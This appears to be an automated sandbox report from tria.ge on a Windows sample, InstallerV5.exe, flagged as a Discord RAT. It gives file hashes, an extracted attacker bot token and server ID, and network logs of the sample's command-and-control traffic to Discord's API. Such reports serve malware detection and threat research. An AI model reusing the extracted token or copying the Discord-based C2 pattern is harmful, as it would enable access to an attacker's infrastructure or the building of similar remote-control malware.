Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
94s -
max time network
130s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
12/07/2024, 15:32 UTC
Behavioral task
behavioral1
Sample
InstallerV5.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
InstallerV5.exe
Resource
win10v2004-20240709-en
General
-
Target
InstallerV5.exe
-
Size
78KB
-
MD5
b61d469cf77f2dd30e1ef31acba14fc3
-
SHA1
e1931cb1d20128df56ddfff69f84c5c1ed2975a7
-
SHA256
574c5d147be871088a39dcf2dc54bf123f74da56ed2a44613e8e643e2d247ac0
-
SHA512
bfee99acb08c57615d6bae9eee7bc331eecc82fee81fa09469fe7e891779cfda34860aacba77baa8c15482141169d366713ed4d6108990d4f553ac0734e256b1
-
SSDEEP
1536:52WjO8XeEXFh5P7v88wbjNrfxCXhRoKV6+V+K8PIC:5Zv5PDwbjNrmAE+KwIC
Malware Config
Extracted
discordrat
-
discord_token
MTI1Nzc5NzM0ODg0Mzg0Nzc1MQ.Gt4uVY.fwQ0zxAA0tWa6W71KN3mXkRSbFGrwOcaXRwFhU
-
server_id
1257772717743276134
Signatures
-
Discord RAT
A RAT written in C# using Discord as a C2.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 4 discord.com 6 discord.com -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3912 InstallerV5.exe
Processes
Network
-
Remote address:8.8.8.8:53Requestgateway.discord.ggIN AResponsegateway.discord.ggIN A162.159.136.234gateway.discord.ggIN A162.159.133.234gateway.discord.ggIN A162.159.134.234gateway.discord.ggIN A162.159.135.234gateway.discord.ggIN A162.159.130.234
-
Remote address:162.159.136.234:443RequestGET /?v=9&encording=json HTTP/1.1
Connection: Upgrade,Keep-Alive
Upgrade: websocket
Sec-WebSocket-Key: uRyzKI1ml22OdbG7cd3c9w==
Sec-WebSocket-Version: 13
Host: gateway.discord.gg
ResponseHTTP/1.1 101 Switching Protocols
Connection: upgrade
sec-websocket-accept: JZ7lNvll4IIDoJ+K3jGQCEvC5Vs=
upgrade: websocket
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z9er0rwkDwhWORge0oijz4ROuaXwaXJaY89XfdstZUXwyc4zG9D6mcq1LpkRyZWRI354F2t6GrOuWu7G8I9NJV9LUulfeDTBMuVjdYd1vFoUZz%2BbwXuWoQcEptdlbJQE9brVMw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Content-Type-Options: nosniff
Server: cloudflare
CF-RAY: 8a2216824b1871b6-LHR
-
Remote address:8.8.8.8:53Request8.8.8.8.in-addr.arpaIN PTRResponse8.8.8.8.in-addr.arpaIN PTRdnsgoogle
-
Remote address:8.8.8.8:53Requestdiscord.comIN AResponsediscord.comIN A162.159.135.232discord.comIN A162.159.138.232discord.comIN A162.159.137.232discord.comIN A162.159.128.233discord.comIN A162.159.136.232
-
Remote address:162.159.135.232:443RequestPOST /api/v9/guilds/1257772717743276134/channels HTTP/1.1
authorization: Bot MTI1Nzc5NzM0ODg0Mzg0Nzc1MQ.Gt4uVY.fwQ0zxAA0tWa6W71KN3mXkRSbFGrwOcaXRwFhU
Content-Type: application/json; charset=utf-8
Host: discord.com
Content-Length: 29
Expect: 100-continue
Connection: Keep-Alive
ResponseHTTP/1.1 403 Forbidden
Content-Type: application/json
Content-Length: 49
Connection: keep-alive
set-cookie: __dcfduid=fe1715d6406311ef951c9e4f562a3599; Expires=Wed, 11-Jul-2029 15:32:48 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: be56019ae011689ff5baf218062aacf5
x-ratelimit-limit: 2000
x-ratelimit-remaining: 1999
x-ratelimit-reset: 1720884768.046
x-ratelimit-reset-after: 86400.000
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hVusaJAh7GPOgJZqZyJON44Jor8YoAzfxqE0mOhzPJTtF0CS8vdbfJquHFrM0fSETEcQxoDqdKhWm4XT4Zb9DnNClZYDtb%2Bn1Ha5XgLmYp0pTPj9NoYTm4esgp0V"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=fe1715d6406311ef951c9e4f562a35996dfd10070d53c1347146f0d5d5bd50bf6592cf2eefcd903ceae23bbf1ae2c725; Expires=Wed, 11-Jul-2029 15:32:48 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=24e5d3d92705ef92c37cee156496c5241a868b58-1720798368; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=MgXI1qPltG8nP0Cy6g_fxooPwwWNPSA4a7CtgqjFs1w-1720798368109-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 8a2216875bcf76f9-LHR
-
Remote address:8.8.8.8:53Request234.136.159.162.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request138.32.126.40.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request232.135.159.162.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request240.221.184.93.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request26.165.165.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request198.187.3.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request107.12.20.2.in-addr.arpaIN PTRResponse107.12.20.2.in-addr.arpaIN PTRa2-20-12-107deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request11.227.111.52.in-addr.arpaIN PTRResponse
-
2.0kB 19.8kB 25 30
HTTP Request
GET https://gateway.discord.gg/?v=9&encording=jsonHTTP Response
101 -
162.159.135.232:443https://discord.com/api/v9/guilds/1257772717743276134/channelstls, httpInstallerV5.exe1.1kB 5.0kB 10 11
HTTP Request
POST https://discord.com/api/v9/guilds/1257772717743276134/channelsHTTP Response
403
-
64 B 144 B 1 1
DNS Request
gateway.discord.gg
DNS Response
162.159.136.234162.159.133.234162.159.134.234162.159.135.234162.159.130.234
-
66 B 90 B 1 1
DNS Request
8.8.8.8.in-addr.arpa
-
57 B 137 B 1 1
DNS Request
discord.com
DNS Response
162.159.135.232162.159.138.232162.159.137.232162.159.128.233162.159.136.232
-
74 B 136 B 1 1
DNS Request
234.136.159.162.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
138.32.126.40.in-addr.arpa
-
74 B 136 B 1 1
DNS Request
232.135.159.162.in-addr.arpa
-
73 B 144 B 1 1
DNS Request
240.221.184.93.in-addr.arpa
-
72 B 146 B 1 1
DNS Request
26.165.165.52.in-addr.arpa
-
71 B 157 B 1 1
DNS Request
198.187.3.20.in-addr.arpa
-
70 B 133 B 1 1
DNS Request
107.12.20.2.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
11.227.111.52.in-addr.arpa